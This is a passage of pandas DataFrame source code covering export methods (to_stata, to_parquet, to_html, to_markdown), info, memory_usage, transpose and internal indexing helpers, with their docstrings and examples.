# len(index_names) + len(DataFrame.columns).
#
# This check allows us to see whether we are
# handling a name / array in the index or column.
if index < index_len:
dtype_mapping = index_dtypes
name = index_names[index]
else:
index -= index_len
dtype_mapping = column_dtypes
name = self.columns[index]
# If dtype_mapping is a dictionary, look up the data type
# associated with the index or column (which can be denoted
# by its name in the DataFrame or its position in the
# DataFrame's array of indices or columns, whichever is
# applicable).
if is_dict_like(dtype_mapping):
if name in dtype_mapping:
dtype_mapping = dtype_mapping[name]
elif index in dtype_mapping:
dtype_mapping = dtype_mapping[index]
else:
dtype_mapping = None
# If no mapping can be found, use the array's
# dtype attribute for formatting.
#
# A valid dtype must either be a type or
# string naming a type.
if dtype_mapping is None:
formats.append(v.dtype)
elif isinstance(dtype_mapping, (type, np.dtype, str)):
formats.append(dtype_mapping)
else:
element = "row" if i < index_len else "column"
msg = f"Invalid dtype {dtype_mapping} specified for {element} {name}"
raise ValueError(msg)
return np.rec.fromarrays(arrays, dtype={"names": names, "formats": formats})
@classmethod
def _from_arrays(
cls,
arrays,
columns,
index,
dtype: Optional[Dtype] = None,
verify_integrity: bool = True,
) -> DataFrame:
"""
Create DataFrame from a list of arrays corresponding to the columns.
Parameters
----------
arrays : list-like of arrays
Each array in the list corresponds to one column, in order.
columns : list-like, Index
The column names for the resulting DataFrame.
index : list-like, Index
The rows labels for the resulting DataFrame.
dtype : dtype, optional
Optional dtype to enforce for all arrays.
verify_integrity : bool, default True
Validate and homogenize all input. If set to False, it is assumed
that all elements of `arrays` are arrays in the form they will be
stored in a block (numpy ndarray or ExtensionArray), that they have
the same length as and are aligned with the index, and that
`columns` and `index` are already Index objects.
Returns
-------
DataFrame
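Examples
--------
A minimal sketch of this private constructor; external code should
prefer the public ``DataFrame`` constructor:
>>> arrays = [np.array([1, 2]), np.array(['a', 'b'])]
>>> pd.DataFrame._from_arrays(arrays, columns=['x', 'y'], index=[0, 1])
   x  y
0  1  a
1  2  b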
"""
if dtype is not None:
dtype = pandas_dtype(dtype)
mgr = arrays_to_mgr(
arrays,
columns,
index,
columns,
dtype=dtype,
verify_integrity=verify_integrity,
)
return cls(mgr)
@deprecate_kwarg(old_arg_name="fname", new_arg_name="path")
def to_stata(
self,
path: FilePathOrBuffer,
convert_dates: Optional[Dict[Label, str]] = None,
write_index: bool = True,
byteorder: Optional[str] = None,
time_stamp: Optional[datetime.datetime] = None,
data_label: Optional[str] = None,
variable_labels: Optional[Dict[Label, str]] = None,
version: Optional[int] = 114,
convert_strl: Optional[Sequence[Label]] = None,
compression: CompressionOptions = "infer",
storage_options: StorageOptions = None,
) -> None:
"""
Export DataFrame object to Stata dta format.
Writes the DataFrame to a Stata dataset file.
"dta" files contain a Stata dataset.
Parameters
----------
path : str, buffer or path object
String, path object (pathlib.Path or py._path.local.LocalPath) or
object implementing a binary write() function. If using a buffer
then the buffer will not be automatically closed after the file
data has been written.
.. versionchanged:: 1.0.0
Previously this was "fname"
convert_dates : dict
Dictionary mapping columns containing datetime types to stata
internal format to use when writing the dates. Options are 'tc',
'td', 'tm', 'tw', 'th', 'tq', 'ty'. Column can be either an integer
or a name. Datetime columns that do not have a conversion type
specified will be converted to 'tc'. Raises NotImplementedError if
a datetime column has timezone information.
write_index : bool
Write the index to Stata dataset.
byteorder : str
Can be ">", "<", "little", or "big". default is `sys.byteorder`.
time_stamp : datetime
A datetime to use as file creation date. Default is the current
time.
data_label : str, optional
A label for the data set. Must be 80 characters or smaller.
variable_labels : dict
Dictionary containing columns as keys and variable labels as
values. Each label must be 80 characters or smaller.
version : {114, 117, 118, 119, None}, default 114
Version to use in the output dta file. Set to None to let pandas
decide between 118 or 119 formats depending on the number of
columns in the frame. Version 114 can be read by Stata 10 and
later. Version 117 can be read by Stata 13 or later. Version 118
is supported in Stata 14 and later. Version 119 is supported in
Stata 15 and later. Version 114 limits string variables to 244
characters or fewer while versions 117 and later allow strings
with lengths up to 2,000,000 characters. Versions 118 and 119
support Unicode characters, and version 119 supports more than
32,767 variables.
.. versionchanged:: 1.0.0
Added support for formats 118 and 119.
convert_strl : list, optional
List of column names to convert to string columns to Stata StrL
format. Only available if version is 117. Storing strings in the
StrL format can produce smaller dta files if strings have more than
8 characters and values are repeated.
compression : str or dict, default 'infer'
For on-the-fly compression of the output dta. If string, specifies
compression mode. If dict, value at key 'method' specifies
compression mode. Compression mode must be one of {'infer', 'gzip',
'bz2', 'zip', 'xz', None}. If compression mode is 'infer' and
`path` is path-like, then detect compression from the following
extensions: '.gz', '.bz2', '.zip', or '.xz' (otherwise no
compression). If dict and compression mode is one of {'zip',
'gzip', 'bz2'}, or inferred as one of the above, other entries
passed as additional compression options.
.. versionadded:: 1.1.0
storage_options : dict, optional
Extra options that make sense for a particular storage connection, e.g.
host, port, username, password, etc., if using a URL that will
be parsed by ``fsspec``, e.g., starting "s3://", "gcs://". An error
will be raised if providing this argument with a local path or
a file-like buffer. See the fsspec and backend storage implementation
docs for the set of allowed keys and values.
.. versionadded:: 1.2.0
Raises
------
NotImplementedError
* If datetimes contain timezone information
* Column dtype is not representable in Stata
ValueError
* Columns listed in convert_dates are neither datetime64[ns]
nor datetime.datetime
* Column listed in convert_dates is not in DataFrame
* Categorical label contains more than 32,000 characters
See Also
--------
read_stata : Import Stata data files.
io.stata.StataWriter : Low-level writer for Stata data files.
io.stata.StataWriter117 : Low-level writer for version 117 files.
Examples
--------
>>> df = pd.DataFrame({'animal': ['falcon', 'parrot', 'falcon',
... 'parrot'],
... 'speed': [350, 18, 361, 15]})
>>> df.to_stata('animals.dta') # doctest: +SKIP
"""
if version not in (114, 117, 118, 119, None):
raise ValueError("Only formats 114, 117, 118 and 119 are supported.")
if version == 114:
if convert_strl is not None:
raise ValueError("strl is not supported in format 114")
from pandas.io.stata import StataWriter as statawriter
elif version == 117:
# mypy: Name 'statawriter' already defined (possibly by an import)
from pandas.io.stata import ( # type: ignore[no-redef]
StataWriter117 as statawriter,
)
else: # versions 118 and 119
# mypy: Name 'statawriter' already defined (possibly by an import)
from pandas.io.stata import ( # type: ignore[no-redef]
StataWriterUTF8 as statawriter,
)
kwargs: Dict[str, Any] = {}
if version is None or version >= 117:
# strl conversion is only supported >= 117
kwargs["convert_strl"] = convert_strl
if version is None or version >= 118:
# Specifying the version is only supported for UTF8 (118 or 119)
kwargs["version"] = version
# mypy: Too many arguments for "StataWriter"
writer = statawriter( # type: ignore[call-arg]
path,
self,
convert_dates=convert_dates,
byteorder=byteorder,
time_stamp=time_stamp,
data_label=data_label,
write_index=write_index,
variable_labels=variable_labels,
compression=compression,
storage_options=storage_options,
**kwargs,
)
writer.write_file()
@deprecate_kwarg(old_arg_name="fname", new_arg_name="path")
def to_feather(self, path: FilePathOrBuffer[AnyStr], **kwargs) -> None:
"""
Write a DataFrame to the binary Feather format.
Parameters
----------
path : str or file-like object
If a string, it will be used as Root Directory path.
**kwargs :
Additional keywords passed to :func:`pyarrow.feather.write_feather`.
Starting with pyarrow 0.17, this includes the `compression`,
`compression_level`, `chunksize` and `version` keywords.
.. versionadded:: 1.1.0
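Examples
--------
A minimal sketch; writing Feather requires the optional pyarrow
package, so the round trip below is skipped in doctests:
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.to_feather('out.feather')  # doctest: +SKIP
>>> pd.read_feather('out.feather')  # doctest: +SKIP
   col1  col2
0     1     3
1     2     4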
"""
from pandas.io.feather_format import to_feather
to_feather(self, path, **kwargs)
@doc(
Series.to_markdown,
klass=_shared_doc_kwargs["klass"],
examples="""Examples
--------
>>> df = pd.DataFrame(
... data={"animal_1": ["elk", "pig"], "animal_2": ["dog", "quetzal"]}
... )
>>> print(df.to_markdown())
| | animal_1 | animal_2 |
|---:|:-----------|:-----------|
| 0 | elk | dog |
| 1 | pig | quetzal |
Output markdown with a tabulate option.
>>> print(df.to_markdown(tablefmt="grid"))
+----+------------+------------+
| | animal_1 | animal_2 |
+====+============+============+
| 0 | elk | dog |
+----+------------+------------+
| 1 | pig | quetzal |
+----+------------+------------+
""",
)
def to_markdown(
self,
buf: Optional[Union[IO[str], str]] = None,
mode: str = "wt",
index: bool = True,
storage_options: StorageOptions = None,
**kwargs,
) -> Optional[str]:
if "showindex" in kwargs:
warnings.warn(
"'showindex' is deprecated. Only 'index' will be used "
"in a future version. Use 'index' to silence this warning.",
FutureWarning,
stacklevel=2,
)
kwargs.setdefault("headers", "keys")
kwargs.setdefault("tablefmt", "pipe")
kwargs.setdefault("showindex", index)
tabulate = import_optional_dependency("tabulate")
result = tabulate.tabulate(self, **kwargs)
if buf is None:
return result
ioargs = get_filepath_or_buffer(buf, mode=mode, storage_options=storage_options)
assert not isinstance(ioargs.filepath_or_buffer, str)
ioargs.filepath_or_buffer.writelines(result)
if ioargs.should_close:
ioargs.filepath_or_buffer.close()
return None
@deprecate_kwarg(old_arg_name="fname", new_arg_name="path")
def to_parquet(
self,
path: FilePathOrBuffer[AnyStr],
engine: str = "auto",
compression: Optional[str] = "snappy",
index: Optional[bool] = None,
partition_cols: Optional[List[str]] = None,
storage_options: StorageOptions = None,
**kwargs,
) -> None:
"""
Write a DataFrame to the binary parquet format.
This function writes the dataframe as a `parquet file
<https://parquet.apache.org/>`_. You can choose different parquet
backends, and have the option of compression. See
:ref:`the user guide <io.parquet>` for more details.
Parameters
----------
path : str or file-like object
If a string, it will be used as Root Directory path
when writing a partitioned dataset. By file-like object,
we refer to objects with a write() method, such as a file handle
(e.g. via builtin open function) or io.BytesIO. The engine
fastparquet does not accept file-like objects.
.. versionchanged:: 1.0.0
Previously this was "fname"
engine : {'auto', 'pyarrow', 'fastparquet'}, default 'auto'
Parquet library to use. If 'auto', then the option
``io.parquet.engine`` is used. The default ``io.parquet.engine``
behavior is to try 'pyarrow', falling back to 'fastparquet' if
'pyarrow' is unavailable.
compression : {'snappy', 'gzip', 'brotli', None}, default 'snappy'
Name of the compression to use. Use ``None`` for no compression.
index : bool, default None
If ``True``, include the dataframe's index(es) in the file output.
If ``False``, they will not be written to the file.
If ``None``, similar to ``True`` the dataframe's index(es)
will be saved. However, instead of being saved as values,
the RangeIndex will be stored as a range in the metadata so it
doesn't require much space and is faster. Other indexes will
be included as columns in the file output.
.. versionadded:: 0.24.0
partition_cols : list, optional, default None
Column names by which to partition the dataset.
Columns are partitioned in the order they are given.
Must be None if path is not a string.
.. versionadded:: 0.24.0
storage_options : dict, optional
Extra options that make sense for a particular storage connection, e.g.
host, port, username, password, etc., if using a URL that will
be parsed by ``fsspec``, e.g., starting "s3://", "gcs://". An error
will be raised if providing this argument with a local path or
a file-like buffer. See the fsspec and backend storage implementation
docs for the set of allowed keys and values.
.. versionadded:: 1.2.0
**kwargs
Additional arguments passed to the parquet library. See
:ref:`pandas io <io.parquet>` for more details.
See Also
--------
read_parquet : Read a parquet file.
DataFrame.to_csv : Write a csv file.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_hdf : Write to hdf.
Notes
-----
This function requires either the `fastparquet
<https://pypi.org/project/fastparquet>`_ or `pyarrow
<https://arrow.apache.org/docs/python/>`_ library.
Examples
--------
>>> df = pd.DataFrame(data={'col1': [1, 2], 'col2': [3, 4]})
>>> df.to_parquet('df.parquet.gzip',
... compression='gzip') # doctest: +SKIP
>>> pd.read_parquet('df.parquet.gzip') # doctest: +SKIP
col1 col2
0 1 3
1 2 4
If you want to get a buffer to the parquet content you can use an
io.BytesIO object, as long as you don't use partition_cols, which
creates multiple files.
>>> import io
>>> f = io.BytesIO()
>>> df.to_parquet(f)
>>> f.seek(0)
0
>>> content = f.read()
"""
from pandas.io.parquet import to_parquet
to_parquet(
self,
path,
engine,
compression=compression,
index=index,
partition_cols=partition_cols,
storage_options=storage_options,
**kwargs,
)
@Substitution(
header_type="bool",
header="Whether to print column labels, default True",
col_space_type="str or int, list or dict of int or str",
col_space="The minimum width of each column in CSS length "
"units. An int is assumed to be px units.\n\n"
" .. versionadded:: 0.25.0\n"
" Ability to use str",
)
@Substitution(shared_params=fmt.common_docstring, returns=fmt.return_docstring)
def to_html(
self,
buf=None,
columns=None,
col_space=None,
header=True,
index=True,
na_rep="NaN",
formatters=None,
float_format=None,
sparsify=None,
index_names=True,
justify=None,
max_rows=None,
max_cols=None,
show_dimensions=False,
decimal=".",
bold_rows=True,
classes=None,
escape=True,
notebook=False,
border=None,
table_id=None,
render_links=False,
encoding=None,
):
"""
Render a DataFrame as an HTML table.
%(shared_params)s
bold_rows : bool, default True
Make the row labels bold in the output.
classes : str or list or tuple, default None
CSS class(es) to apply to the resulting html table.
escape : bool, default True
Convert the characters <, >, and & to HTML-safe sequences.
notebook : {True, False}, default False
Whether the generated HTML is for IPython Notebook.
border : int
A ``border=border`` attribute is included in the opening
`<table>` tag. Default ``pd.options.display.html.border``.
encoding : str, default "utf-8"
Set character encoding.
.. versionadded:: 1.0
table_id : str, optional
A css id is included in the opening `<table>` tag if specified.
render_links : bool, default False
Convert URLs to HTML links.
.. versionadded:: 0.24.0
%(returns)s
See Also
--------
to_string : Convert DataFrame to a string.
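Examples
--------
A minimal sketch of rendering a small frame (the exact markup depends
on display options, so the output below is abbreviated):
>>> df = pd.DataFrame({'col1': [1, 2]})
>>> html = df.to_html()
>>> print(html)  # doctest: +SKIP
<table border="1" class="dataframe">
  ...
</table>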
"""
if justify is not None and justify not in fmt._VALID_JUSTIFY_PARAMETERS:
raise ValueError("Invalid value for justify parameter")
formatter = fmt.DataFrameFormatter(
self,
columns=columns,
col_space=col_space,
na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify,
justify=justify,
index_names=index_names,
header=header,
index=index,
bold_rows=bold_rows,
escape=escape,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=decimal,
table_id=table_id,
render_links=render_links,
)
# TODO: a generic formatter would belong in DataFrameFormatter
return formatter.to_html(
buf=buf,
classes=classes,
notebook=notebook,
border=border,
encoding=encoding,
)
# ----------------------------------------------------------------------
@Substitution(
klass="DataFrame",
type_sub=" and columns",
max_cols_sub=(
"""max_cols : int, optional
When to switch from the verbose to the truncated output. If the
DataFrame has more than `max_cols` columns, the truncated output
is used. By default, the setting in
``pandas.options.display.max_info_columns`` is used.
"""
),
examples_sub=(
"""
>>> int_values = [1, 2, 3, 4, 5]
>>> text_values = ['alpha', 'beta', 'gamma', 'delta', 'epsilon']
>>> float_values = [0.0, 0.25, 0.5, 0.75, 1.0]
>>> df = pd.DataFrame({"int_col": int_values, "text_col": text_values,
... "float_col": float_values})
>>> df
int_col text_col float_col
0 1 alpha 0.00
1 2 beta 0.25
2 3 gamma 0.50
3 4 delta 0.75
4 5 epsilon 1.00
Prints information about all columns:
>>> df.info(verbose=True)
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 int_col 5 non-null int64
1 text_col 5 non-null object
2 float_col 5 non-null float64
dtypes: float64(1), int64(1), object(1)
memory usage: 248.0+ bytes
Prints a summary of the column count and dtypes but not per-column
information:
>>> df.info(verbose=False)
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Columns: 3 entries, int_col to float_col
dtypes: float64(1), int64(1), object(1)
memory usage: 248.0+ bytes
Pipe the output of DataFrame.info to a buffer instead of sys.stdout,
get the buffer content and write it to a text file:
>>> import io
>>> buffer = io.StringIO()
>>> df.info(buf=buffer)
>>> s = buffer.getvalue()
>>> with open("df_info.txt", "w",
... encoding="utf-8") as f: # doctest: +SKIP
... f.write(s)
260
The `memory_usage` parameter enables deep introspection mode,
especially useful for big DataFrames and fine-tuning memory
optimization:
>>> random_strings_array = np.random.choice(['a', 'b', 'c'], 10 ** 6)
>>> df = pd.DataFrame({
... 'column_1': np.random.choice(['a', 'b', 'c'], 10 ** 6),
... 'column_2': np.random.choice(['a', 'b', 'c'], 10 ** 6),
... 'column_3': np.random.choice(['a', 'b', 'c'], 10 ** 6)
... })
>>> df.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1000000 entries, 0 to 999999
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 column_1 1000000 non-null object
1 column_2 1000000 non-null object
2 column_3 1000000 non-null object
dtypes: object(3)
memory usage: 22.9+ MB
>>> df.info(memory_usage='deep')
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1000000 entries, 0 to 999999
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 column_1 1000000 non-null object
1 column_2 1000000 non-null object
2 column_3 1000000 non-null object
dtypes: object(3)
memory usage: 165.9 MB"""
),
see_also_sub=(
"""
DataFrame.describe: Generate descriptive statistics of DataFrame
columns.
DataFrame.memory_usage: Memory usage of DataFrame columns."""
),
)
@doc(DataFrameInfo.info)
def info(
self,
verbose: Optional[bool] = None,
buf: Optional[IO[str]] = None,
max_cols: Optional[int] = None,
memory_usage: Optional[Union[bool, str]] = None,
null_counts: Optional[bool] = None,
) -> None:
return DataFrameInfo(
self, verbose, buf, max_cols, memory_usage, null_counts
).info()
def memory_usage(self, index=True, deep=False) -> Series:
"""
Return the memory usage of each column in bytes.
The memory usage can optionally include the contribution of
the index and elements of `object` dtype.
This value is displayed in `DataFrame.info` by default. This can be
suppressed by setting ``pandas.options.display.memory_usage`` to False.
Parameters
----------
index : bool, default True
Specifies whether to include the memory usage of the DataFrame's
index in returned Series. If ``index=True``, the memory usage of
the index is the first item in the output.
deep : bool, default False
If True, introspect the data deeply by interrogating
`object` dtypes for system-level memory consumption, and include
it in the returned values.
Returns
-------
Series
A Series whose index is the original column names and whose values
are the memory usage of each column in bytes.
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of an
ndarray.
Series.memory_usage : Bytes consumed by a Series.
Categorical : Memory-efficient array for string values with
many repeated values.
DataFrame.info : Concise summary of a DataFrame.
Examples
--------
>>> dtypes = ['int64', 'float64', 'complex128', 'object', 'bool']
>>> data = dict([(t, np.ones(shape=5000).astype(t))
... for t in dtypes])
>>> df = pd.DataFrame(data)
>>> df.head()
int64 float64 complex128 object bool
0 1 1.0 1.000000+0.000000j 1 True
1 1 1.0 1.000000+0.000000j 1 True
2 1 1.0 1.000000+0.000000j 1 True
3 1 1.0 1.000000+0.000000j 1 True
4 1 1.0 1.000000+0.000000j 1 True
>>> df.memory_usage()
Index 128
int64 40000
float64 40000
complex128 80000
object 40000
bool 5000
dtype: int64
>>> df.memory_usage(index=False)
int64 40000
float64 40000
complex128 80000
object 40000
bool 5000
dtype: int64
The memory footprint of `object` dtype columns is ignored by default:
>>> df.memory_usage(deep=True)
Index 128
int64 40000
float64 40000
complex128 80000
object 160000
bool 5000
dtype: int64
Use a Categorical for efficient storage of an object-dtype column with
many repeated values.
>>> df['object'].astype('category').memory_usage(deep=True)
5216
"""
result = self._constructor_sliced(
[c.memory_usage(index=False, deep=deep) for col, c in self.items()],
index=self.columns,
)
if index:
result = self._constructor_sliced(
self.index.memory_usage(deep=deep), index=["Index"]
).append(result)
return result
def transpose(self, *args, copy: bool = False) -> DataFrame:
"""
Transpose index and columns.
Reflect the DataFrame over its main diagonal by writing rows as columns
and vice-versa. The property :attr:`.T` is an accessor to the method
:meth:`transpose`.
Parameters
----------
*args : tuple, optional
Accepted for compatibility with NumPy.
copy : bool, default False
Whether to copy the data after transposing, even for DataFrames
with a single dtype.
Note that a copy is always required for mixed dtype DataFrames,
or for DataFrames with any extension types.
Returns
-------
DataFrame
The transposed DataFrame.
See Also
--------
numpy.transpose : Permute the dimensions of a given array.
Notes
-----
Transposing a DataFrame with mixed dtypes will result in a homogeneous
DataFrame with the `object` dtype. In such a case, a copy of the data
is always made.
Examples
--------
**Square DataFrame with homogeneous dtype**
>>> d1 = {'col1': [1, 2], 'col2': [3, 4]}
>>> df1 = pd.DataFrame(data=d1)
>>> df1
col1 col2
0 1 3
1 2 4
>>> df1_transposed = df1.T # or df1.transpose()
>>> df1_transposed
0 1
col1 1 2
col2 3 4
When the dtype is homogeneous in the original DataFrame, we get a
transposed DataFrame with the same dtype:
>>> df1.dtypes
col1 int64
col2 int64
dtype: object
>>> df1_transposed.dtypes
0 int64
1 int64
dtype: object
**Non-square DataFrame with mixed dtypes**
>>> d2 = {'name': ['Alice', 'Bob'],
... 'score': [9.5, 8],
... 'employed': [False, True],
... 'kids': [0, 0]}
>>> df2 = pd.DataFrame(data=d2)
>>> df2
name score employed kids
0 Alice 9.5 False 0
1 Bob 8.0 True 0
>>> df2_transposed = df2.T # or df2.transpose()
>>> df2_transposed
0 1
name Alice Bob
score 9.5 8
employed False True
kids 0 0
When the DataFrame has mixed dtypes, we get a transposed DataFrame with
the `object` dtype:
>>> df2.dtypes
name object
score float64
employed bool
kids int64
dtype: object
>>> df2_transposed.dtypes
0 object
1 object
dtype: object
"""
nv.validate_transpose(args, dict())
# construct the args
dtypes = list(self.dtypes)
if self._is_homogeneous_type and dtypes and is_extension_array_dtype(dtypes[0]):
# We have EAs with the same dtype. We can preserve that dtype in transpose.
dtype = dtypes[0]
arr_type = dtype.construct_array_type()
values = self.values
new_values = [arr_type._from_sequence(row, dtype=dtype) for row in values]
result = self._constructor(
dict(zip(self.index, new_values)), index=self.columns
)
else:
new_values = self.values.T
if copy:
new_values = new_values.copy()
result = self._constructor(
new_values, index=self.columns, columns=self.index
)
return result.__finalize__(self, method="transpose")
@property
def T(self) -> DataFrame:
return self.transpose()
# ----------------------------------------------------------------------
# Indexing Methods
def _ixs(self, i: int, axis: int = 0):
"""
Parameters
----------
i : int
axis : int
Notes
-----
If a slice is passed, the resulting data will be a view.
"""
# irow
if axis == 0:
new_values = self._mgr.fast_xs(i)
# if we are a copy, mark as such
copy = isinstance(new_values, np.ndarray) and new_values.base is None
result = self._constructor_sliced(
new_values,
index=self.columns,
name=self.index[i],
dtype=new_values.dtype,
)
result._set_is_copy(self, copy=copy)
return result
# icol
else:
label = self.columns[i]
values = self._mgr.iget(i)
result = self._box_col_values(values, i)
# this is a cached value, mark it so
result._set_as_cached(label, self)
return result
def _get_column_array(self, i: int) -> ArrayLike:
"""
Get the values of the i'th column (ndarray or ExtensionArray, as stored
in the Block)
"""
return self._mgr.iget_values(i)
def _iter_column_arrays(self) -> Iterator[ArrayLike]:
"""
Iterate over the arrays of all columns in order.
This returns the values as stored in the Block (ndarray or ExtensionArray).
"""
for i in range(len(self.columns)):
yield self._get_column_array(i)
def __getitem__(self, key):
key = lib.item_from_zerodim(key)
key = com.apply_if_callable(key, self)
if is_hashable(key):
# shortcut if the key is in columns
if self.columns.is_unique and key in self.columns:
if self.columns.nlevels > 1:
return self._getitem_multilevel(key)
return self._get_item_cache(key)
# Do we have a slicer (on rows)?
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
# either we have a slice or we have a string that can be converted
# to a slice for partial-string date indexing
return self._slice(indexer, axis=0)
# Do we have a (boolean) DataFrame?
if isinstance(key, DataFrame):
return self.where(key)
# Do we have a (boolean) 1d indexer?
if com.is_bool_indexer(key):
return self._getitem_bool_array(key)
# We are left with two options: a single key, and a collection of keys.
# We interpret tuples as collections only for non-MultiIndex
is_single_key = isinstance(key, tuple) or not is_list_like(key)
if is_single_key:
if self.columns.nlevels > 1:
return self._getitem_multilevel(key)
indexer = self.columns.get_loc(key)
if is_integer(indexer):
indexer = [indexer]
else:
if is_iterator(key):
key = list(key)
indexer = self.loc._get_listlike_indexer(key, axis=1, raise_missing=True)[1]
# take() does not accept boolean indexers
if getattr(indexer, "dtype", None) == bool:
indexer = np.where(indexer)[0]
data = self._take_with_is_copy(indexer, axis=1)
if is_single_key:
# What does looking for a single key in a non-unique index return?
# The behavior is inconsistent. It returns a Series, except when
# - the key itself is repeated (test on data.shape, #9519), or
# - we have a MultiIndex on columns (test on self.columns, #21309)
if data.shape[1] == 1 and not isinstance(self.columns, MultiIndex):
data = data[key]
return data
def _getitem_bool_array(self, key):
# also raises Exception if object array with NA values
# warning here just in case -- previously __setitem__ was
# reindexing but __getitem__ was not; it seems more reasonable to
# go with the __setitem__ behavior since that is more consistent
# with all other indexing behavior
if isinstance(key, Series) and not key.index.equals(self.index):
warnings.warn(
"Boolean Series key will be reindexed to match DataFrame index.",
UserWarning,
stacklevel=3,
)
elif len(key) != len(self.index):
raise ValueError(
f"Item wrong length {len(key)} instead of {len(self.index)}."
)
# check_bool_indexer will throw exception if Series key cannot
# be reindexed to match DataFrame rows
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
return self._take_with_is_copy(indexer, axis=0)
def _getitem_multilevel(self, key):
# self.columns is a MultiIndex
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, np.ndarray)):
new_columns = self.columns[loc]
result_columns = maybe_droplevels(new_columns, key)
if self._is_mixed_type:
result = self.reindex(columns=new_columns)
result.columns = result_columns
else:
new_values = self.values[:, loc]
result = self._constructor(
new_values, index=self.index, columns=result_columns
)
result = result.__finalize__(self)
# If there is only one column being returned, and its name is
# either an empty string, or a tuple with an empty string as its
# first element, then treat the empty string as a placeholder
# and return the column as if the user had provided that empty
# string in the key. If the result is a Series, exclude the
# implied empty string from its name.
if len(result.columns) == 1:
top = result.columns[0]
if isinstance(top, tuple):
top = top[0]
if top == "":
result = result[""]
if isinstance(result, Series):
result = self._constructor_sliced(
result, index=self.index, name=key
)
result._set_is_copy(self)
return result
else:
# loc is neither a slice nor ndarray, so must be an int
return self._ixs(loc, axis=1)
def _get_value(self, index, col, takeable: bool = False):
"""
Quickly retrieve single value at passed column and index.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
scalar
"""
if takeable:
series = self._ixs(col, axis=1)
return series._values[index]
series = self._get_item_cache(col)
engine = self.index._engine
try:
loc = engine.get_loc(index)
return series._values[loc]
except KeyError:
# GH 20629
if self.index.nlevels > 1:
# partial indexing forbidden
raise
# we cannot handle direct indexing
# use positional
col = self.columns.get_loc(col)
index = self.index.get_loc(index)
return self._get_value(index, col, takeable=True)
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
# either we have a slice or we have a string that can be converted
# to a slice for partial-string date indexing
return self._setitem_slice(indexer, value)
if isinstance(key, DataFrame) or getattr(key, "ndim", None) == 2:
self._setitem_frame(key, value)
elif isinstance(key, (Series, np.ndarray, list, Index)):
self._setitem_array(key, value)
else:
# set column
self._set_item(key, value)
def _setitem_slice(self, key: slice, value):
# NB: we can't just use self.loc[key] = value because that
# operates on labels and we need to operate positional for
# backwards-compat, xref GH#31469
self._check_setitem_copy()
self.iloc._setitem_with_indexer(key, value)
def _setitem_array(self, key, value):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
if len(key) != len(self.index):
raise ValueError(
f"Item wrong length {len(key)} instead of {len(self.index)}!"
)
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
self._check_setitem_copy()
self.iloc._setitem_with_indexer(indexer, value)
else:
if isinstance(value, DataFrame):
if len(value.columns) != len(key):
raise ValueError("Columns must be same length as key")
for k1, k2 in zip(key, value.columns):
self[k1] = value[k2]
else:
self.loc._ensure_listlike_indexer(key, axis=1)
indexer = self.loc._get_listlike_indexer(
key, axis=1, raise_missing=False
)[1]
self._check_setitem_copy()
self.iloc._setitem_with_indexer((slice(None), indexer), value)
def _setitem_frame(self, key, value):
# support boolean setting with DataFrame input, e.g.
# df[df > df2] = 0
if isinstance(key, np.ndarray):
if key.shape != self.shape:
raise ValueError("Array conditional must be same shape as self")
key = self._constructor(key, **self._construct_axes_dict())
if key.size and not is_bool_dtype(key.values):
raise TypeError(
"Must pass DataFrame or 2-d ndarray with boolean values only"
)
self._check_inplace_setting(value)
self._check_setitem_copy()
self._where(-key, value, inplace=True)
def _iset_item(self, loc: int, value):
self._ensure_valid_index(value)
# technically _sanitize_column expects a label, not a position,
# but the behavior is the same as long as we pass broadcast=False
value = self._sanitize_column(loc, value, broadcast=False)
NDFrame._iset_item(self, loc, value)
# check if we are modifying a copy
# try to set first as we want an invalid
# value exception to occur first
if len(self):
self._check_setitem_copy()
def _set_item(self, key, value):
"""
Add series to DataFrame in specified column.
If the value is a numpy array (not a Series/TimeSeries), it must be
the same length as the DataFrame's index or an error will be thrown.
Series/TimeSeries will be conformed to the DataFrame's index to
ensure homogeneity.
"""
self._ensure_valid_index(value)
value = self._sanitize_column(key, value)
NDFrame._set_item(self, key, value)
# check if we are modifying a copy
# try to set first as we want an invalid
# value exception to occur first
if len(self):
self._check_setitem_copy()
def _set_value(self, index, col, value, takeable: bool = False):
"""
Put single value at passed column and index.
Parameters
----------
index : row label
col : column label
value : scalar
takeable : interpret the index/col as indexers, default False
"""
try:
if takeable is True:
series = self._ixs(col, axis=1)
series._set_value(index, value, takeable=True)
return
series = self._get_item_cache(col)
engine = self.index._engine
loc = engine.get_loc(index)
validate_numeric_casting(series.dtype, value)
series._values[loc] = value
# Note: trying to use series._set_value breaks tests in
# tests.frame.indexing.test_indexing and tests.indexing.test_partial
except (KeyError, TypeError):
# set using a non-recursive method & reset the cache
if takeable:
self.iloc[index, col] = value
else:
self.loc[index, col] = value
self._item_cache.pop(col, None)
def _ensure_valid_index(self, value):
"""
Ensure that, if we don't have an index, we can create one from the
passed value.
"""
# GH5632, make sure that we are a Series convertible
if not len(self.index) and is_list_like(value) and len(value):
try:
value = Series(value)
except (ValueError, NotImplementedError, TypeError) as err:
raise ValueError(
"Cannot set a frame with no defined index "
"and a value that cannot be converted to a Series"
) from err
# GH31368 preserve name of index
index_copy = value.index.copy()
if self.index.name is not None:
index_copy.name = self.index.name
self._mgr = self._mgr.reindex_axis(index_copy, axis=1, fill_value=np.nan)
